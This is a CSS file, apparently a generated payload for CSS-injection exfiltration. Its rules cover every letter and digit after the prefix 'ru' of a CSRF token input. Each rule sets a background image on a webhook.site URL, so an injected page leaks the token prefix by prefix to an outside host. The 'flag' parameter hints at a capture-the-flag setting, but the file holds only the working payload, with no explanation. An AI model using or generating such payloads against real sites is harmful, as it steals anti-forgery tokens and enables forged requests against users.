input.csrf[value^='rua'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=rua); }

input.csrf[value^='rub'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=rub); }

input.csrf[value^='ruc'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruc); }

input.csrf[value^='rud'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=rud); }

input.csrf[value^='rue'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=rue); }

input.csrf[value^='ruf'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruf); }

input.csrf[value^='rug'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=rug); }

input.csrf[value^='ruh'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruh); }

input.csrf[value^='rui'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=rui); }

input.csrf[value^='ruj'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruj); }

input.csrf[value^='ruk'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruk); }

input.csrf[value^='rul'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=rul); }

input.csrf[value^='rum'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=rum); }

input.csrf[value^='run'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=run); }

input.csrf[value^='ruo'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruo); }

input.csrf[value^='rup'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=rup); }

input.csrf[value^='ruq'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruq); }

input.csrf[value^='rur'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=rur); }

input.csrf[value^='rus'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=rus); }

input.csrf[value^='rut'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=rut); }

input.csrf[value^='ruu'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruu); }

input.csrf[value^='ruv'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruv); }

input.csrf[value^='ruw'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruw); }

input.csrf[value^='rux'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=rux); }

input.csrf[value^='ruy'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruy); }

input.csrf[value^='ruz'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruz); }

input.csrf[value^='ruA'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruA); }

input.csrf[value^='ruB'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruB); }

input.csrf[value^='ruC'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruC); }

input.csrf[value^='ruD'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruD); }

input.csrf[value^='ruE'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruE); }

input.csrf[value^='ruF'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruF); }

input.csrf[value^='ruG'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruG); }

input.csrf[value^='ruH'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruH); }

input.csrf[value^='ruI'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruI); }

input.csrf[value^='ruJ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruJ); }

input.csrf[value^='ruK'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruK); }

input.csrf[value^='ruL'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruL); }

input.csrf[value^='ruM'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruM); }

input.csrf[value^='ruN'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruN); }

input.csrf[value^='ruO'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruO); }

input.csrf[value^='ruP'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruP); }

input.csrf[value^='ruQ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruQ); }

input.csrf[value^='ruR'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruR); }

input.csrf[value^='ruS'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruS); }

input.csrf[value^='ruT'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruT); }

input.csrf[value^='ruU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruU); }

input.csrf[value^='ruV'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruV); }

input.csrf[value^='ruW'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruW); }

input.csrf[value^='ruX'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruX); }

input.csrf[value^='ruY'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruY); }

input.csrf[value^='ruZ'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ruZ); }

input.csrf[value^='ru0'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ru0); }

input.csrf[value^='ru1'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ru1); }

input.csrf[value^='ru2'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ru2); }

input.csrf[value^='ru3'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ru3); }

input.csrf[value^='ru4'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ru4); }

input.csrf[value^='ru5'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ru5); }

input.csrf[value^='ru6'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ru6); }

input.csrf[value^='ru7'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ru7); }

input.csrf[value^='ru8'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ru8); }

input.csrf[value^='ru9'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ru9); }
